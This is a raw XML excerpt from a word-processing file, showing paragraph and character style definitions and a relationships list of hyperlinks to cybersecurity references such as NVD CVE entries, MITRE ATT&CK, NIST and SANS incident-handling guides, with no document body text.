    <w:basedOn w:val="660"/>
    <w:link w:val="181"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="181">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="180"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="182">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="147"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="183">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="660"/>
    <w:link w:val="184"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="184">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="183"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="185">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="147"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="186">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="147"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0563c1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="187">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="147"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="954f72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="188">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="189">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="190">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="191">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="192">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="880"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="193">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="194">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="195">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1540"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="196">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>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60"/>
    <w:next w:val="660"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:afterAutospacing="0"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="660" w:default="1">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="66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62" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="663">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="660"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="664">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="660"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="true"/>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www.deskera.com/blog/ai-revolution-production-scheduling-manufacturing/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.7jb0gjg0skfk" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.lgwsydd8ton8" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.6slaqytm6rng" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.mrzlem96bn5g" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.s8nizy38zjid" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.w20zf539zk50" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.7ei6cehqau9m" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.6700mxurm0jk" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.a6qj6d6ob5us" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.vt7pa9pnxleo" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.kmkzvadw8vtf" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1Hla5SGinX2u34Wh7IVvRiDpM4oMariaRGauS8Ra1VsU/edit?tab=t.0#heading=h.3jsa2kcfxixu"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hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-0708" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/" TargetMode="External"/><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hyperlink" Target="https://nvlpubs.nist.gov/nistpubs" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-1999-0524" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-0144" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2001-0001" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dataprise.com/resources/blog/10-cybersecurity-tips-mid-sized-businesses/" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dig8ital.com/post/ecommerce-security-architecture/" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vita2.virginia.gov/uploadedFiles/Oversight/EA/SecurityArchitectureReport.pdf" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.loffler.com/blog/the-top-5-cyber-security-checkpoints-you-should-know" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.isaca.org/-/media/info/csxf-practice-quiz/index.html" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kiteworks.com/secure-file-sharing/a-comprehensive-guide-to-understanding-plan-of-action-and-milestones-poams/" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://purplesec.us/learn/cybersecurity-strategy/" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberseek.org/pathway.html" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.priv.gc.ca/en/privacy-topics/privacy-breaches/respond-to-a-privacy-breach-at-yourbusiness/gd_pb_201810/" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.priv.gc.ca/en/privacy-topics/privacy-laws-in-canada/the-personal-information-protection-and-electronicdocuments-act-pipeda/" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fightspam.gc.ca/eic/site/030.nsf/eng/home" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/score/incident-forms" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/reading-room/whitepapers/incident" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sansorg.egnyte.com/dl/6Btqoa63at/" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.priv.gc.ca/en/privacy-topics/privacy-laws-in-canada/the-personal-information-protection-and-electronicdocuments-act-pipeda/" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gdpr-info.eu/" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvlpubs.nist.gov/nistpubs" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.journalofcybersecurity.com/equifax-breach" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.canada.ca/en/industry" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paessler.com/manuals/prtg" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://doi.org/10.6028/NIST.SP.800-92" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/cis-benchmarks/" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.loom.com/share/00573c6ce1964715a5e31f7552556921?sid=59db38ff-091a-4e51-93c8-7baf489fe24b"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jpg"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.wireshark.org/DisplayFilters" TargetMode="External"/><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image" Target="media/image56.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><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image" Target="media/image68.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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Application>ONLYOFFICE/8.2.2.22</Application>
  <DocSecurity>0</DocSecurity>
  <ScaleCrop>0</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="0" baseType="variant"/>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="0" baseType="lpstr"/>
  </TitlesOfParts>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2025-01-17T13:24:44Z</dcterms:modified>
</cp:coreProperties>
</file>